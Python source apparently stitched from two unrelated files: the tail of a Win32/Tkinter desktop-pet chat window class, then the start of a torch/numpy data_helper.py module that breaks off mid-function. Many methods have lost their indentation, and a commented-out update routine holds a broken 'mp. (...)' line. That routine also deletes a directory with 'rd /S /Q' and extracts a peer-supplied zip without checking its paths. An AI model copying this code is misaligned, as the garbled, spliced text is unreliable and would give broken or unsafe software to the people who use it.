elif cap[0] == 'myCharFile':
self.myCharFile = cap[1]
elif cap[0] == 'autoBehave':
self.autoBehave = (cap[1]=='True')
    def BuildWindow(self, className):
        """Create the layered, borderless pet window at a random screen position."""
        style = win32con.WS_POPUP|win32con.WS_VISIBLE
        xstyle = win32con.WS_EX_LAYERED
        self.hwnd = win32gui.CreateWindowEx(
            xstyle,
            className,
            "image_window",
            style,
            randint(200,800),
            randint(200,500),
            130,
            130,
            0,
            0,
            self.hinst,
            None)
        # White is the transparency color key: white bitmap areas are see-through.
        win32gui.SetLayeredWindowAttributes(self.hwnd, RGB(255,255,255),0,win32con.LWA_COLORKEY)
        self.StayTop()
def SetImages(self, Image_list):
'''private purpose, for showing action implementation'''
try:
for image in self.Image_list:
image.release_img()
except:pass
self.Image_list = Image_list
self.image_index = -1
def SwitchNextImage(self):
'''private purpose, for showing action implementation
maybe call Resize here'''
self.image_index = (self.image_index+1)%len(self.Image_list)
#redrawing
win32gui.InvalidateRect(self.hwnd, None, True)
def GetCurrentImageRemainTime(self):
return self.image_remain_times[self.image_index]
    def MoveTo(self, x, y):
        # Move the window to screen coordinates (x, y), keeping its size.
        win32gui.SetWindowPos(self.hwnd, 0, x, y, 0, 0, win32con.SWP_NOSIZE|win32con.SWP_NOOWNERZORDER)
    def GoOnTop(self):
        # Raise the window to the top of the Z-order once.
        win32gui.SetWindowPos(self.hwnd, win32con.HWND_TOP, 0, 0, 0, 0, win32con.SWP_NOMOVE|win32con.SWP_NOSIZE)
    def StayTop(self):
        # Make the window always-on-top.
        win32gui.SetWindowPos(self.hwnd, win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE|win32con.SWP_NOSIZE)
    def Resize(self, w, h):
        # Resize the window to w x h, keeping its position.
        win32gui.SetWindowPos(self.hwnd, 0, 0, 0, w, h, win32con.SWP_NOMOVE|win32con.SWP_NOOWNERZORDER)
    def OnNCCreate(self, hwnd, message, wparam, lparam):
        '''
        DO NOT edit unless you know what you're doing
        '''
        # Returning True lets window creation proceed.
        return True
    def OnLButtonDown(self, hwnd, message, wparam, lparam):
        """Begin a drag: remember the grab point and capture the mouse."""
        self.dragging = True
        self.drag_point = win32gui.ClientToScreen(self.hwnd, (win32api.LOWORD(lparam), win32api.HIWORD(lparam)))
        self.drag_pre_pos = win32gui.ClientToScreen(self.hwnd, (0,0))
        win32gui.SetCapture(hwnd)
        return True
    def OnLButtonUp(self, hwnd, message, wparam, lparam):
        """End a click/drag: acknowledge unread messages, then play the
        click animation (or return to idle after a drag)."""
        '''2.Click on image_window so send i read the message'''
        if self.receive_message_read == False: #if there are messages not read, now is reading
            if self.readCheck == True:
                mt.SendMessageAndAnime(self.conn_socket, '', 'checked') # tell I read it
            self.receive_message_read=True #no message not read
            self.DestroyChatMsgWins()
        if self.drag_showing == False:
            self.showAction(self.getActionPath('click.txt'))
        else:
            self.showAction(self.getActionPath('idle.txt'))
        self.dragging = False
        self.drag_showing = False
        win32gui.ReleaseCapture()
        '''set other attaced windows' position, if put this in OnMove(), cause vanishing'''
        self.SetAttachedWinPos()
        return True
    def OnMouseMove(self, hwnd, message, wparam, lparam):
        """While dragging, move the window to follow the cursor and switch
        to the drag animation on the first movement."""
        if self.dragging :
            cur_x, cur_y = win32gui.ClientToScreen(self.hwnd, (win32api.LOWORD(lparam), win32api.HIWORD(lparam)))
            '''deal for negative cur_x, cur_y'''
            # LOWORD/HIWORD are unsigned 16-bit; re-interpret as signed.
            if cur_x > (1<<15)-1:
                cur_x -= (1<<16)
            if cur_y > (1<<15)-1:
                cur_y -= (1<<16)
            dx = cur_x-self.drag_point[0]
            dy = cur_y-self.drag_point[1]
            # Ignore sub-pixel jitter.
            if abs(dx)+abs(dy) < 1:
                return True
            self.drag_point = (cur_x, cur_y)
            if not self.drag_showing:
                self.drag_showing = True
                self.showAction(self.getActionPath('drag.txt'), True)
            rect = win32gui.GetWindowRect(self.hwnd)
            x, y = rect[0], rect[1]
            self.MoveTo(x+dx, y+dy)
        return True
    def OnRButtonUp(self, hwnd, message, wparam, lparam):
        """Show the right-click context menu (speak / read check / history /
        auto behave / close) and apply the chosen action."""
        menu = win32gui.CreatePopupMenu()
        win32gui.AppendMenu(menu, win32con.MF_STRING, 1, 'speak')
        win32gui.AppendMenu(menu, win32con.MF_STRING, 2, 'read check')
        win32gui.AppendMenu(menu, win32con.MF_STRING, 3, 'historical messages')
        win32gui.AppendMenu(menu, win32con.MF_STRING, 5, 'auto behave')
        win32gui.AppendMenu(menu, win32con.MF_STRING, 4, 'close')
        if self.readCheck == True: #check new menu's mark
            win32gui.CheckMenuItem(menu, 2, win32con.MF_CHECKED)
        if self.autoBehave == True:
            win32gui.CheckMenuItem(menu, 5, win32con.MF_CHECKED)
        x, y = getXY(lparam)
        x, y = win32gui.ClientToScreen(hwnd, (x, y))
        '''show the popup menu, 0x100 means return item id right after'''
        item_id = win32gui.TrackPopupMenu(menu, 0x100, x, y, 0, hwnd, None)
        if item_id == 1:
            # Toggle the speak window: destroy it when open, open it otherwise.
            try:
                turnOffTk(self.speak_window)
                self.speak_window = None
                self.speak_window_hwnd = 0
            except Exception:
                self.ShowSpeakWindow()
        elif item_id == 2:
            self.readCheck=not self.readCheck
        elif item_id == 3:
            # Toggle the history window likewise.
            try:
                turnOffTk(self.history_window)
                self.history_window = None
            except Exception:
                self.ShowHistoryWindow()
        elif item_id == 4:
            win32gui.DestroyWindow(self.hwnd)
        elif item_id == 5:
            self.autoBehave = not self.autoBehave
        win32gui.DestroyMenu(menu)
        return True
    def OnMove(self, hwnd, message, wparam, lparam):
        '''
        called when window is moved.
        control things here
        '''
        # During a drag OnMouseMove already repositions attached windows.
        if not self.dragging:
            self.SetAttachedWinPos()
        return win32gui.DefWindowProc(hwnd, message, wparam, lparam)
    def OnSize(self, hwnd, message, wparam, lparam):
        '''
        called when window is resized.
        control things here
        '''
        self.SetAttachedWinPos()
        return win32gui.DefWindowProc(hwnd, message, wparam, lparam)
    def SetAttachedWinPos(self):
        """Reposition every attached Tk window (speak box, chat bubbles, sent
        bubble, name label) relative to the pet window; each is best-effort
        because any of them may not exist."""
        try:self.speak_window.geometry('+%d+%d' % self.GetSpeakWindowPos())
        except :pass
        for i in range(len(self.chat_msg_win)):
            try:self.chat_msg_win[i].geometry('%dx%d+%d+%d' % self.GetChatMsgWinSizePos(i))
            except :pass
        try:self.sent_msg_win.geometry('%dx%d+%d+%d' % self.GetSentMsgWinSizePos())
        except :pass
        try:
            self.name_win.geometry('+%d+%d'%self.GetNameWinPos())
        except :pass
    def GetNameWinPos(self):
        """Return (x, y) for the name label: horizontally centered under the
        pet window, pushed further down when the speak window is open."""
        x = (win32gui.GetWindowRect(self.hwnd)[0]+win32gui.GetWindowRect(self.hwnd)[2])//2\
            - len(self.chat_name)*5
        y = win32gui.GetWindowRect(self.hwnd)[3]
        if self.speak_window != None:
            y += 50
        return x,y
    def GetSpeakWindowPos(self):
        """Return (x, y) for the speak window: bottom-left of the pet window."""
        x = win32gui.GetWindowRect(self.hwnd)[0]
        y = win32gui.GetWindowRect(self.hwnd)[3]
        return x,y
    def ShowSpeakWindow(self):
        '''
        show the speaking window.
        this function does not close it even if it's shown.
        '''
        self.speak_window = tk.Tk()
        # Borderless, always-on-top tool window attached to the pet.
        self.speak_window.overrideredirect(True)
        self.speak_window.wm_attributes('-alpha',1,'-disabled',False,'-toolwindow',True, '-topmost', True)
        frame = tk.Frame(self.speak_window)
        self.input_text = tk.Entry(frame)
        self.input_text.pack(side='left',expand=True, fill='both')
        self.input_text.bind('<Return>', func=self.InputTextHitReturn)
        send_btn = tk.Button(frame, text='send', command=self.SendText)
        send_btn.pack(side='right')
        anime_btn = tk.Button(frame, text='anime', command=self.SelectAnime)
        anime_btn.pack(side='right')
        frame.pack()
        self.input_text.focus()
        self.speak_window.geometry('+%d+%d' % self.GetSpeakWindowPos())
        # Remember the native handle so focus can be restored later.
        self.speak_window_hwnd = win32gui.GetForegroundWindow()
        win32gui.SetFocus(self.speak_window_hwnd)
        self.SetAttachedWinPos()
    def ShowNameWin(self):
        """Create the borderless label window showing the friend's name."""
        r = tk.Toplevel()
        r.overrideredirect(True)
        f = tk.Frame(r, bd=1,bg='black')
        var = tk.StringVar()
        l = tk.Label(f,bg='#bbffdd', justify='center', fg='black', font=('Consolas', 17),textvariable=var)
        var.set(self.chat_name)
        l.pack(fill='both',expand=True)
        f.pack(fill='both',expand=True)
        r.wm_attributes('-toolwindow',True, '-topmost', True)
        r.geometry('+%d+%d'%self.GetNameWinPos())
        self.name_win = r
    def ShowNewChatMsgWin(self, msg):
        '''show msg in a new bubble window'''
        r = tk.Toplevel()
        r.overrideredirect(True)
        f = tk.Frame(r, bd=1,bg='black')
        var = tk.StringVar()
        l = tk.Label(f,bg='#bbddff', justify='center', fg='black', textvariable=var)
        var.set(msg)
        l.pack(fill='both',expand=True)
        f.pack(fill='both',expand=True)
        r.wm_attributes('-toolwindow',True, '-topmost', True)
        #r.geometry('%dx%d+%d+%d'%self.GetNewChatMsgWinSizePos())
        # Geometry is applied by SetAttachedWinPos for all bubbles at once.
        self.chat_msg_win.append(r)
        self.SetAttachedWinPos()
    def showSentChatMsgWin(self, msg):
        """Show the last *sent* message in its bubble window, replacing any
        previous sent-message bubble."""
        r = tk.Toplevel()
        r.overrideredirect(True)
        f = tk.Frame(r, bd=1,bg='black')
        var = tk.StringVar()
        l = tk.Label(f,bg='#bbddff', justify='center', fg='black', textvariable=var)
        var.set(msg)
        l.pack(fill='both',expand=True)
        f.pack(fill='both',expand=True)
        r.wm_attributes('-toolwindow',True, '-topmost', True)
        r.geometry('%dx%d+%d+%d'%self.GetSentMsgWinSizePos())
        # Only one sent-message bubble at a time.
        try:
            self.sent_msg_win.destroy()
        except:pass
        self.sent_msg_win = r
    def InputTextHitReturn(self, event):
        # Enter key in the input box sends the message.
        self.SendText()
    def GetChatMsgWinSizePos(self, index):
        '''control the position of new chat msg'''
        # Bubbles stack upward above the pet window, oldest on top.
        w = 200
        h = 32
        y_dis = 7
        x = win32gui.GetWindowRect(self.hwnd)[0]
        y = win32gui.GetWindowRect(self.hwnd)[1] - (y_dis+h)*(len(self.chat_msg_win) - index)
        return w,h,x,y
    def GetSentMsgWinSizePos(self):
        """Return (w, h, x, y) for the sent-message bubble: to the right of
        the pet window, vertically centered."""
        w = 250
        h = 32
        y_dis = 7
        x_dis = 10
        rect = win32gui.GetWindowRect(self.hwnd)
        x = rect[2] + x_dis
        y = (rect[3]+rect[1])//2
        return w,h,x,y
    def GetNewChatMsgWinSizePos(self):
        # Position for a bubble appended at the end of the current stack.
        return self.GetChatMsgWinSizePos(len(self.chat_msg_win))
    def GetHistoryWindowPos(self):
        '''control the position of history window'''
        # Opens at the current cursor position.
        return win32gui.GetCursorPos()
def GetHistoryString(self):
'''
read history file and make it pretty
return a pretty string for history window display
'''
s = ''
try:
with open('data/'+str(self.friendID)+'/'+history_file) as file:
for line in file.read().splitlines():
s += line+'\n'
except Exception:pass
for i in range(self.history_window_width):
s += '-'
s += '\n'
for msg in self.this_messages:
s += msg+'\n'
return s
    def ShowHistoryWindow(self):
        '''
        set self.history_window a tk loop
        '''
        '''the window'''
        self.history_window = tk.Tk()
        self.history_window.wm_attributes('-toolwindow',True)
        self.history_window.resizable(width=False, height=False)
        self.history_window.title('[%s] %s' % ('HISTORY', self.chat_name))
        '''the history text'''
        # Read-only text widget filled with the formatted history.
        text = tk.Text(self.history_window,
                       exportselection=0,
                       width=self.history_window_width,
                       height=10)
        text.insert(tk.END, self.GetHistoryString())
        text.config(state=tk.DISABLED)
        text.pack(side='left',fill='y')
        '''create scrollbar'''
        scrollbar = tk.Scrollbar(self.history_window)
        scrollbar.pack(side='right', fill='y')
        '''enable scrolling'''
        text.config(yscrollcommand=scrollbar.set)
        scrollbar.config(command=text.yview)
        '''set position and size, and then show it'''
        self.history_window.geometry('+%d+%d' % self.GetHistoryWindowPos())
    def SelectAnime(self):
        '''
        show anime list for user to choose, or hide it if it was shown.
        TODO: change name to OnSelectShowAnime.
        '''
        if hasattr(self, 'anime_lb') and self.anime_lb != None :
            # Listbox already shown: hide it and clear the pending selection.
            self.anime_lb.destroy()
            self.anime_lb = None
            self.tmp_anime = ''
        else:
            anime_list = self.getSelfActionList()
            self.anime_lb = tk.Listbox(self.speak_window, height = len(anime_list))
            self.anime_lb.bind("<<ListboxSelect>>", self.OnSelect)
            for i in range(len(anime_list)):
                self.anime_lb.insert(i+1, anime_list[i])
            self.anime_lb.pack(expand=True, fill='both')
def OnSelect(self, event):
widget = event.widget
selection=widget.curselection()
value = widget.get(selection[0])
self.tmp_anime = value
    def set_cht_str_msg(self):
        """Buffer the typed message for later delivery (peer unreachable):
        take it from the input box and append it to the offline string."""
        msg = self.input_text.get()
        self.input_text.delete(0, tk.END)
        self.cht_str_msg += msg + '\n'
    def SendText(self):
        '''
        SendText to remote chatter
        '''
        '''get the speak_window handle'''
        self.speak_window_hwnd = win32gui.GetForegroundWindow()
        # Lazily establish the connection on first send.
        if self.conn_socket == None:
            if self.online == True:
                print('try connect to', self.ip)
                self.conn_socket = mt.StartTalking(self.ip)
                print('result:', self.conn_socket)
            if self.conn_socket == None:
                # Could not connect: buffer the message for later.
                self.set_cht_str_msg()
                return
            myThread = threading.Thread(target=self.sendVersionAndUpdata)
            myThread.setDaemon(True)
            myThread.start()
            assert mp.recvPacket(self.conn_socket) == b'ok'
            self.DoAfterConnectEstablished()
        msg = self.input_text.get()
        # Strip newlines: the wire format is single-line messages.
        msg = msg.replace('\n', '')
        msg = msg.replace('\r', '')
        mt.SendMessageAndAnime(self.conn_socket, msg, self.tmp_anime)
        self.this_messages.append('you: '+msg)
        '''1.send new message so readCheck set to False'''
        self.sended_message_read = False #no need but on logical
        if msg != '':
            self.showSentChatMsgWin(msg)
        self.showAction(self.getActionPath('send.txt'))
        self.input_text.delete(0, tk.END)
        win32gui.SetFocus(self.speak_window_hwnd)
    def OnPaint(self, hwnd, message, wparam, lparam):
        """WM_PAINT: draw the current animation frame; white is the
        transparent color key set in BuildWindow."""
        dc,ps = win32gui.BeginPaint(hwnd)
        if len(self.Image_list)>0:
            self.Image_list[self.image_index].draw_on_dc(dc, RGB(255,255,255))
        win32gui.EndPaint(hwnd, ps)
        return True
def DestroyChatMsgWins(self):
for win in self.chat_msg_win:
try:turnOffTk(win)
except :pass
self.chat_msg_win = []
    def OnDestroy(self, hwnd, message, wparam, lparam):
        '''
        clean things here
        kill all tk things here
        '''
        # Stop the idle-behavior thread, persist config and this session's
        # history, tear down every attached Tk window, close the socket,
        # then notify the owner via the after-close callback.
        self.elfAutoBehaviorThread.stop = True
        with open(config_file, 'w') as file:
            file.write('readCheck:'+str(self.readCheck)+'\n')
            file.write('myCharFile:'+str(self.myCharFile)+'\n')
            file.write('autoBehave:'+str(self.autoBehave)+'\n')
        with open('data/'+str(self.friendID)+'/'+history_file, 'a') as file:
            for each in self.this_messages:
                file.write(each+'\n')
        try:turnOffTk(self.speak_window)
        except :pass
        try:turnOffTk(self.history_window)
        except :pass
        self.DestroyChatMsgWins()
        try:turnOffTk(self.sent_msg_win)
        except:pass
        try:turnOffTk(self.name_win)
        except:pass
        if self.conn_socket != None:
            mt.SendChatEndMessage(self.conn_socket)
            self.conn_socket.close()
            self.conn_socket = None
        self.after(self)
        return True
def getFileFromPath(self, path):
names=[]
temp = path.split('\\')
for i in temp:
names += i.split('/')
return names[len(names)-1]
    def getCharFile(self):
        """Return the path of the friend's character (skin) file."""
        return self.charFile
    def showAction(self, skelFile, repeating = False, acting=True):
        '''
        show an action
        the acting parameter should not be used by public user.

        skelFile: skeleton animation file (7 lines per frame per skin part);
        a sibling '<skelFile>.config' supplies the window size on its first
        line and one per-frame duration per following line.
        repeating: loop the animation instead of playing it once.
        the acting parameter should not be used by public user.
        '''
        skelData=[]
        charFile = open(skelFile, 'r')
        for line in charFile.readlines():
            skelData.append(line.split())
        charFile.close()
        self.image_remain_times = []
        with open(skelFile+'.config') as file:
            x_size, y_size = [int(v) for v in file.readline().split()]
            for line in file:
                self.image_remain_times.append(float(line))
        charData = getCharacter(self.getCharFile())
        self.Resize(x_size, y_size)
        # Sort skins by draw order (third field).
        charData = sorted(charData,key= lambda temp:int(temp[2]))
        img=[]
        # Each frame consists of skelTypes consecutive skeleton lines.
        skelTypes = 7
        for i in range(int(len(skelData)/skelTypes)):
            imgTemp = Image.Image()
            temp = skelData[i*skelTypes]
            charDataChange=[]
            # Field 6 non-zero means this frame overrides the skins' draw order.
            if int(temp[5]) != 0:
                for skin in charData:
                    temp = skelData[i*skelTypes + int(skin[1])-1]
                    skin[2] = temp[5]
                    charDataChange.append(skin)
                charDataChange = sorted(charDataChange,key= lambda temp:int(temp[2]))
            else:
                charDataChange = charData
            for skin in charDataChange:
                temp = skelData[i*skelTypes + int(skin[1])-1]
                skinTemp = skin[0]
                # Field 5 non-zero selects an alternate bitmap variant '<name>_<n>.bmp'.
                if int(temp[4]) != 0:
                    skinTemp, st= skinTemp.split('.', 1)
                    skinTemp = skinTemp + '_' + temp[4] + '.bmp'
                hbmp2 = win32gui.LoadImage(0, skinTemp, win32gui.IMAGE_BITMAP, 0, 0,win32gui.LR_LOADFROMFILE)
                imgTemp.append_component(hbmp2, int(temp[0]), int(temp[1]), int(temp[2]), int(temp[3]))
            img.append(imgTemp)
        self.SetImages(img)
        self.actionNow = self.getFileFromPath(skelFile)
        if acting:
            # Frame advancing happens on a dedicated thread.
            self.actionThread = ChangeImageThread(self, repeating)
            self.actionThread.setDaemon(True)
            self.actionThread.start()
        else:
            self.actionThread = None
def showCharacter(self, skelFile):
    '''
    Show an animation consisting of a single, non-repeating action.
    '''
    self.showAction(skelFile, False)
def listen_to_chat_messagesInThread(self):
    '''
    Receive loop run on a background thread: pre-process incoming chat
    messages (unpack them here if they were packed to ensure completeness)
    and hand them to the UI thread via the queue + WM_CHATMSGRECV message.
    Returns when the connection drops or the peer ends the chat.
    '''
    print('begin recving')
    while True:
        try:
            msg, anime = mt.RecvMessageAndAnime(self.conn_socket)
            if mt.IsChatEndMessage(msg, anime):
                # Peer requested chat close; reuse the error path below.
                raise Exception('chat closed by remote')
            elif msg == "" and anime == "checked": #receive a readCheck
                # Read-receipt confirmation: show the "read" animation and
                # drop the pending sent-message bubble.
                self.sended_message_read = True #no need but on logical
                self.showAction(self.getActionPath('read2.txt')) #show message read animation
                self.sent_msg_win.destroy()
                continue
            else: self.receive_message_read = False #received a normal message but not readCheck, control to send when next click
        except Exception as e:
            # Any receive error (or remote close) ends the loop and releases
            # the socket exactly once.
            print(e)
            print('not connected anymore')
            if self.conn_socket != None:
                print('close chat')
                self.conn_socket.close()
            else:
                print('chat closed before close')
            self.conn_socket = None
            return
        # Forward the message to the GUI thread; SendMessage triggers
        # OnChatMessageReceived on the window's own thread.
        self.chatmsg_queue.put((msg, anime))
        win32gui.SendMessage(self.hwnd, WM_CHATMSGRECV, 0, 0)
def OnChatMessageReceived(self, hwnd, win32msg, wp, lp):
    '''
    Win32 handler for WM_CHATMSGRECV, invoked on the main thread, so
    touching the GUI here is safe. Pops one (msg, anime) pair from the
    queue, shows the message bubble / plays the notification sound, and
    starts the optional animation. (Chat history could be added here.)
    '''
    msg, anime = self.chatmsg_queue.get()
    print(msg)
    self.this_messages.append(self.chat_name+': '+msg)
    if msg != '':
        self.ShowNewChatMsgWin(msg)
        PlaySound('skin/newmessage.wav', SND_ASYNC)
    if anime != '':
        self.showAction(self.getActionPath(anime), repeating= True)
    # Return keyboard focus to the input window if one is open.
    if self.speak_window_hwnd != 0:
        win32gui.SetFocus(self.speak_window_hwnd)
def getParentDirectory(self, path):
    """Join the '/'-separated components of *path* up to (excluding) the
    first component that ends in '.txt'; returns the joined prefix."""
    joined = ''
    for part in path.split('/'):
        if len(part) > 4 and part.endswith('.txt'):
            break
        joined = os.path.join(joined, part)
    return joined
'''
def cmpCharVersion(self, myDataSize = 0, hisDataSize = 0):
if myDataSize == hisDataSize:
return True
return False
def getCharDataSize(self, charDirectory):
temp = 0
for dirPath, dirNames, fileNames in os.walk(charDirectory):
for fileName in fileNames:
file = os.path.join(dirPath, fileName)
temp += os.path.getsize(file)
return temp
def checkCharVersion(self):
text = str(self.getCharDataSize(self.getParentDirectory(self.myCharFile)))
mp. (self.conn_socket, text.encode('utf8'))
data = mp.recvPacket(self.conn_socket).decode('utf8')
if self.cmpCharVersion(self.getCharDataSize(self.getParentDirectory(self.charFile)), int(data)):
return True
return False
def updateCharacter(self):
#fileName = mp.recvPacket(self.conn_socket).decode('utf8')
fileName = self.friendID+'.zip'
with open(fileName, 'wb') as cfile:
while True:
data = mp.recvPacket(self.conn_socket)
if data == b'EOF':
break
cfile.write(data)
win32gui.ShowWindow(self.hwnd, 0)
os.system('rd /S /Q ' + self.getParentDirectory(self.charFile))
zf = zipfile.ZipFile(fileName)
zf.extractall(self.getParentDirectory(self.charFile))
zf.close()
win32gui.ShowWindow(self.hwnd, 1)
os.remove(fileName)
def uploadCharacter(self):
sfileName = 'ArchiveName.zip'
zf = zipfile.ZipFile(sfileName,'w',zipfile.ZIP_DEFLATED)
parentDir = self.getParentDirectory(self.myCharFile)
for dirPath, dirNames, fileNames in os.walk(parentDir):
for fileName in fileNames:
file = os.path.join(dirPath, fileName)
zf.write(file, file[len(parentDir)+1:])
zf.close()
#mp.sendPacket(self.conn_socket, sfileName.encode('utf8'))
with open(sfileName, 'rb') as file:
while True:
data = file.read(4096)
if not data:
break
mp.sendPacket(self.conn_socket, data)
time.sleep(1) # delete after send in fixed len
mp.sendPacket(self.conn_socket, b'EOF')
os.remove(sfileName)
'''
def sendVersionAndUpdata(self):
    '''
    Open a fresh socket to the peer's update port (12348) and let
    updataIfNeed() sync the character data if the remote version differs.
    '''
    print('send version and updata in image')
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((self.ip, 12348))
    print('updata sock:', sock)
    #arg = (sock, myChafile, friChafile, friendID, callbackfunc)
    updataIfNeed(sock, self.myCharFile, self.friendID, self.setChadisplay, self.callbackfunc)
def getActionPath(self, action_filename):
    """Build the path to an action file inside the character's skeleton directory."""
    base = self.getParentDirectory(self.charFile)
    return base + '/skeleton/' + action_filename
def getSelfActionList(self):
    """List the '.txt' action files available in the local character's skeleton dir."""
    print(self.myCharFile)
    skeleton_dir = self.getParentDirectory(self.myCharFile) + '/skeleton/'
    return [name for name in os.listdir(skeleton_dir) if os.path.splitext(name)[1] == '.txt']
def callbackfunc(self):
    # Placeholder progress callback passed to updataIfNeed(); only logs.
    print('callback')
def setChadisplay(self, value=None):
    '''
    Combined getter/setter for the character display.
    Called with no argument it returns the character file path; called with
    0/1 it hides/shows the window (restarting the idle animation on show)
    and returns None.
    '''
    if value == None:
        return self.charFile
    win32gui.ShowWindow(self.hwnd, value)
    if value == 1:
        self.showAction(self.getActionPath('idle.txt'), repeating = True)
    return None
class ChangeImageThread(threading.Thread):
    '''Thread that advances the owning window's animation frames.

    It keeps stepping frames while it is still the window's current
    ``actionThread``; a non-repeating animation falls back to the idle
    action once the frame index wraps back to 0.
    '''

    def __init__(self, win, repeating):
        self.win = win
        self.only_once = not repeating
        # Becomes True after the first wrap check, so a one-shot animation
        # plays through once before switching to idle.
        self.started = False
        super(ChangeImageThread, self).__init__()

    def run(self):
        try:
            # Stop as soon as the window installs a different actionThread.
            while self.win.actionThread is self:
                self.win.SwitchNextImage()
                if self.only_once and self.win.image_index == 0:
                    if self.started:
                        self.win.showAction(self.win.getActionPath('idle.txt'), True)
                    self.started = True
                time.sleep(self.win.GetCurrentImageRemainTime())
        except:pass  # NOTE(review): bare except hides all errors, incl. window teardown races
        # Drop the window reference so it can be garbage collected.
        self.win = None
if __name__ == '__main__':
    '''
    test codes are too old, try some new codes.
    '''
    # Ad-hoc manual test: create a window and poke a chat bubble at it from
    # a worker thread, then run the win32 message loop.
    win = image_window(lambda:win32gui.PostQuitMessage(0), '123', None, '111.111.111.111', 'data/1/char/1/character1.txt', '1')
    def test(msg):
        win.ShowNewChatMsgWin(msg)
        print(msg,'thread ended')
    # NOTE(review): this test causes problems because it uses tk from a thread.
    threading.Thread(target=test, args=('Hello, World',)).start()
    #win.uploadCharacter()
    print('uploadCharacter done')
    win32gui.PumpMessages()
|
data_helper.py | from typing import Iterable, Any, Optional, List
from collections.abc import Sequence
import numbers
import time
import copy
from threading import Thread
from queue import Queue
import numpy as np
import torch
def to_device(item: Any, device: str, ignore_keys: Optional[list] = None) -> Any:
    """
    Overview:
        Transfer data to a certain device.
    Arguments:
        - item (:obj:`Any`): the item to be transferred
        - device (:obj:`str`): the device wanted
        - ignore_keys (:obj:`Optional[list]`): dict keys whose values are left
          untouched; only honoured at the top level of a dict (not propagated
          into nested containers, matching the original behaviour). ``None``
          (the default) means no ignored keys — used instead of a mutable
          ``[]`` default to avoid the shared-mutable-default pitfall.
    Returns:
        - item (:obj:`Any`): the transferred item
    Raises:
        - TypeError: if the item type is not supported.
    .. note:
        Now supports item type: :obj:`torch.nn.Module`, :obj:`torch.Tensor`, :obj:`Sequence`, \
        :obj:`dict`, :obj:`numbers.Integral`, :obj:`numbers.Real`, :obj:`np.ndarray`, :obj:`str` and :obj:`None`.
    """
    if ignore_keys is None:
        ignore_keys = []
    if isinstance(item, torch.nn.Module):
        return item.to(device)
    elif isinstance(item, torch.Tensor):
        return item.to(device)
    elif isinstance(item, Sequence):
        # str is also a Sequence; keep it unchanged rather than exploding it
        # into a list of characters.
        if isinstance(item, str):
            return item
        else:
            return [to_device(t, device) for t in item]
    elif isinstance(item, dict):
        new_item = {}
        for k in item.keys():
            if k in ignore_keys:
                new_item[k] = item[k]
            else:
                new_item[k] = to_device(item[k], device)
        return new_item
    elif isinstance(item, numbers.Integral) or isinstance(item, numbers.Real):
        return item
    elif isinstance(item, np.ndarray) or isinstance(item, np.bool_):
        return item
    elif item is None or isinstance(item, str):
        return item
    else:
        raise TypeError("not support item type: {}".format(type(item)))
def to_dtype(item: Any, dtype: type) -> Any:
    r"""
    Overview:
        Cast every tensor contained in ``item`` to ``dtype``, recursing
        through sequences and dicts.
    Arguments:
        - item (:obj:`Any`): the item whose tensors should be cast
        - dtype (:obj:`type`): the target dtype
    Returns:
        - item (:obj:`object`): the dtype-converted item
    Raises:
        - TypeError: for unsupported item types.
    .. note:
        Now supports item type: :obj:`torch.Tensor`, :obj:`Sequence`, :obj:`dict`
    """
    if isinstance(item, torch.Tensor):
        return item.to(dtype=dtype)
    if isinstance(item, Sequence):
        return [to_dtype(element, dtype) for element in item]
    if isinstance(item, dict):
        return {key: to_dtype(value, dtype) for key, value in item.items()}
    raise TypeError("not support item type: {}".format(type(item)))
def to_tensor(
        item: Any,
        dtype: Optional[torch.dtype] = None,
        ignore_keys: Optional[list] = None,
        transform_scalar: bool = True
) -> torch.Tensor:
    r"""
    Overview:
        Change ``numpy.ndarray`` and sequences of scalars to ``torch.Tensor``,
        and keep other data types unchanged.
    Arguments:
        - item (:obj:`Any`): the item to be changed
        - dtype (:obj:`Optional[torch.dtype]`): the dtype of the wanted tensor
        - ignore_keys (:obj:`Optional[list]`): dict keys whose values are kept
          as-is. ``None`` (the default) means no keys are ignored — used
          instead of a mutable ``[]`` default to avoid the
          shared-mutable-default pitfall.
        - transform_scalar (:obj:`bool`): whether bare scalars are wrapped in
          0-dim tensors
    Returns:
        - item (:obj:`torch.Tensor`): the changed tensor
    Raises:
        - TypeError: if the item type is not supported.
    .. note:
        Now supports item type: :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
    """
    if ignore_keys is None:
        ignore_keys = []

    def transform(d):
        # Central scalar/sequence -> tensor conversion honouring ``dtype``.
        if dtype is None:
            return torch.as_tensor(d)
        else:
            return torch.tensor(d, dtype=dtype)

    if isinstance(item, dict):
        new_data = {}
        for k, v in item.items():
            if k in ignore_keys:
                new_data[k] = v
            else:
                new_data[k] = to_tensor(v, dtype, ignore_keys, transform_scalar)
        return new_data
    elif isinstance(item, list) or isinstance(item, tuple):
        if len(item) == 0:
            return []
        elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
            return transform(item)
        elif hasattr(item, '_fields'):  # namedtuple
            # NOTE(review): ignore_keys/transform_scalar are not propagated
            # here, matching the original behaviour.
            return type(item)(*[to_tensor(t, dtype) for t in item])
        else:
            new_data = []
            for t in item:
                new_data.append(to_tensor(t, dtype, ignore_keys, transform_scalar))
            return new_data
    elif isinstance(item, np.ndarray):
        if dtype is None:
            # float64 arrays are deliberately downcast to float32 (FloatTensor).
            if item.dtype == np.float64:
                return torch.FloatTensor(item)
            else:
                return torch.from_numpy(item)
        else:
            return torch.from_numpy(item).to(dtype)
    elif isinstance(item, bool) or isinstance(item, str):
        return item
    elif np.isscalar(item):
        if transform_scalar:
            if dtype is None:
                return torch.as_tensor(item)
            else:
                return torch.as_tensor(item).to(dtype)
        else:
            return item
    elif item is None:
        return None
    elif isinstance(item, torch.Tensor):
        if dtype is None:
            return item
        else:
            return item.to(dtype)
    else:
        raise TypeError("not support item type: {}".format(type(item)))
def to_ndarray(item: Any, dtype: np.dtype = None) -> np.ndarray:
    r"""
    Overview:
        Change ``torch.Tensor`` and sequences of scalars to ``np.ndarray``,
        keeping other data types unchanged.
    Arguments:
        - item (:obj:`object`): the item to be changed
        - dtype (:obj:`type`): the dtype of the wanted ndarray
    Returns:
        - item (:obj:`object`): the changed ndarray
    Raises:
        - TypeError: if the item type is not supported.
    .. note:
        Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
    """

    def _as_array(value):
        return np.array(value) if dtype is None else np.array(value, dtype=dtype)

